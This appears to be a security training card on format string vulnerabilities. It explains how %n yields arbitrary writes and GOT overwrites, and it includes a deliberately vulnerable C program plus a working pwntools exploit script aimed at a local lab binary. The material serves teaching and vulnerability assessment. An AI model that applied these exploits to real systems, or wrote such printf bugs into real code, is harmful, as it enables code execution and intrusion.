Format String Arbitrary Write: Exploiting %n for GOT Overwrite and Code Redirection

binary_exploitation Difficulty 1–5 30 min certifiable

Theory

Why This Matters

Format string vulnerabilities have been weaponised in critical production software for decades. The Wu-FTPd 2.6.0 vulnerability (CVE-2000-0573) allowed unauthenticated remote code execution by passing a format string through the SITE EXEC command, giving attackers root on affected servers. Microsoft's Windows Print Spooler and numerous embedded firmware images have carried identical root causes. NICE framework work roles K0168 (knowledge of exploit code and how it works) and K0169 (knowledge of reverse engineering concepts) are directly exercised when analysing these bugs, and T0028 (conduct vulnerability assessments) names format string testing as a required capability. Any binary analyst must understand how %n turns a logging call into an arbitrary write primitive.

Core Concept

A format string vulnerability occurs when user-controlled data is passed directly as the format argument to a variadic function such as printf, fprintf, or sprintf — for example printf(user_input) instead of the safe printf("%s", user_input). The C standard defines %n as a conversion specifier that writes the number of characters printed so far into the int * argument at the corresponding position in the variadic argument list. Because the format string controls both the number of characters printed and which stack slot is treated as a pointer, an attacker can aim %n at any writable address.

The write primitive works in three steps. First, the attacker arranges the target address on the stack — either directly in the format string buffer (which itself lives on the stack) or by exploiting the fact that the buffer is already reachable as a stack argument. Second, the attacker uses padding specifiers such as %<N>c to print exactly the number of characters that equal the desired value. Third, %<pos>$n writes that count to the address at position <pos> relative to the format-string argument. Four-byte writes use %n; two-byte writes use %hn; one-byte writes use %hhn.

Common write targets are the Global Offset Table (GOT), which maps imported library function addresses at a known static offset from the binary base when ASLR is off or PIE is disabled, and function pointers stored in writable data such as __malloc_hook, __free_hook, or application-level dispatch tables. Overwriting a GOT entry for a frequently called function like exit or puts with the address of a one-gadget or system yields code execution the next time that function is called.

Technical Deep-Dive

// Vulnerable program pattern
#include <stdio.h>
int main(int argc, char *argv[]) {
    char buf[256];
    fgets(buf, sizeof(buf), stdin);
    printf(buf);          // BUG: user controls format string
    return 0;
}

The stack layout at the printf call looks like (x86-32, simplified):

[esp+0]  -> ptr to buf      (format string argument)
[esp+4]  -> buf[0..3]       (1st variadic slot, position %1$...)
[esp+8]  -> buf[4..7]       (position %2$...)
...
[esp+N]  -> &target_addr    (embedded in buf, some position %K$...)

An attacker finding the buffer at offset 6 on the stack can write value 0xdeadbeef to address 0x0804a010 (a GOT entry):

from pwn import *

elf    = ELF('./vuln')
target = elf.got['exit']          # address to overwrite
value  = elf.sym['win']           # value to write there

# fmtstr_payload(offset, {addr: value}) builds the payload automatically
payload = fmtstr_payload(6, {target: value})

p = process('./vuln')
p.sendline(payload)
p.interactive()

fmtstr_payload handles the arithmetic: it calculates how many bytes must be printed before each %n write, inserts the correct %<N>c padding, and serialises the addresses at the right stack positions. When the target is 32-bit it uses %n (4-byte writes); for smaller deltas it splits the write into %hn or %hhn pairs to avoid printing billions of characters.

Reverse Engineering Methodology

When auditing a binary for format string bugs: 1. Locate all calls to variadic format functions: printf, fprintf, sprintf, snprintf, syslog, err, warn. 2. For each call, check whether the format argument is a string literal or a pointer to user-controlled memory. In IDA/Ghidra look for mov [esp], eax where eax holds a user buffer, rather than mov [esp], offset .rodata:fmt_str. 3. Confirm writability of the target section (checksec --file=./vuln shows RELRO: No RELRO or Partial RELRO). 4. Use %p chains to leak the stack and identify the buffer's offset before crafting the write.

Common Reversing Errors

Off-by-one in offset counting: Start counting at 1 (not 0) from the format string argument. Use %1$p, %2$p, … and compare output to the buffer's content to locate its offset precisely.
Printing too many bytes causes a crash: If the target value requires printing more characters than fit in a signed 32-bit counter, split the write into two %hn half-word writes at adjacent addresses (low word first, high word second).
Null bytes in address terminate the string: On 32-bit targets this is common with addresses like 0x0804xxxx. Place addresses at the end of the format string, or use %hhn byte-by-byte writes to avoid embedding nulls early.
ASLR defeats static GOT addresses: Pair with a %p leak first; compute the GOT address as leaked_base + static_offset before sending the write payload.

Challenge Lab

Reinforce your learning with a hands-on generated challenge based on this card's competency.